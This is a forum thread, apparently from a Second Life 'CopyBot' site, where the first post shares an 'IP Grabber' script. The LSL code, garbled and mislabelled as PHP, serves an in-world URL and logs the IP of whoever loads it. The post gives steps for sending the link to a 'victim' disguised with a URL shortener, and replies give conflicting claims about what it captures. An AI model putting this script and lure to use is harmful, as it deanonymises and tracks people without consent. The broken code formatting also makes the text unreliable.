IP Grabber

Thread Started By zion

8162
11
  • 41 Vote(s) - 2.59 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Rate Thread
#1
1. place the script in an object you're wearing
2. click the object any time you enter a new sim
3. collect IPS (only works on people on certain viewers)
4. alternatively use the link the object posts in local chat(llOwnerSay)
and give it to a victim to click and get their ip that way
5. use tinyurl or something to make the link less obvious

PHP Code:
integer listen_handle;
key url_request;
string web;
key avatar;
integer counter;



 
default
{
    
     
touch(integer num_detected)
     {
         
llResetScript();
     }
     
     
    
state_entry()
    {
       
        
url_request llRequestURL();
        

//llOwnerSay(web);
    
}

    
    
    
http_request(key idstring methodstring body)
{
if (
url_request == id)
{
url_request "";
if (
method == URL_REQUEST_GRANTED)
{

web=body;
llOwnerSay(web);

        
llSetPrimMediaParams(0,
[
PRIM_MEDIA_AUTO_PLAY,TRUE,
PRIM_MEDIA_CURRENT_URL,web,
PRIM_MEDIA_HOME_URL,web,
PRIM_MEDIA_PERMS_CONTROLPRIM_MEDIA_PERM_NONE,
PRIM_MEDIA_HEIGHT_PIXELS,512,
PRIM_MEDIA_WIDTH_PIXELS,512]);


}
else if (
method == URL_REQUEST_DENIED)
{


}
}
if (
method == "GET") {
string ip llGetHTTPHeader(id"x-remote-ip");
string user llGetHTTPHeader(id"x-path-info");

llOwnerSay"Got IP: " ip " / " user);


}
}

Reply


#2
I'll give it a try, tnx!
Reply


#3
Works for me. It tracks the nearest people first. It should track all the people inside the parcel including yourself. Also even if its placed on ground. Once touched. It will continously send out scans flooding your screen. But you get the IPs. Cheerrs! Great script!
Reply


#4
<p>nice job i'm go try it :) </p>
Reply


#5
so it isnt necessary that the other people wear an attachment?
Reply


#6
No ... just rez object and put script in object. After click on object, script scanning IP address from peoples on sim.
Reply


#7
It only collects your own IP address, not the people in the sim.
Reply


#8
will check it out
Reply


#9
will check it out
Reply


#10
thank you for the script, will give it a try
Reply




Forum Jump:

1 Guest(s)
Share this:

About Second Life Copybot

Second Life CopyBot Forum is a place where you can get items for Second Life and other vitual worlds for free. With our CopyBot viewers you can export and import any content from these virtual worlds and modify them in 3D software such as Blender, 3D studio Macx etc...